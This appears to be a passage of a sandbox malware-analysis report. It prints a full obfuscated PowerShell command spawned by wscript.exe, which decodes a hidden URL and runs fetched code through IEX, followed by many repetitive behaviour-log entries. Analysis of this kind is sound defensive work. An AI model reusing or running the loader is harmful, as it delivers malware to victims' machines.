FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:Dagbr
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B70812B push ebx; ret 4_2_00007FFD9B70816A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7BFD push esp; ret 4_2_00007FFD9B7D7BFE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7023 pushad ; ret 4_2_00007FFD9B7D7025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7F93 push ecx; ret 4_2_00007FFD9B7D7F94
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7D7944 push edi; ret 4_2_00007FFD9B7D7945
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_043942D9 push ebx; ret 9_2_043942DA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0439B470 push 0000006Dh; ret 9_2_0439B4A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04393711 push esp; iretd 9_2_04393751
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0722C35C push esp; ret 9_2_0722C35D
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5558Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4364Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6694Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3150Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
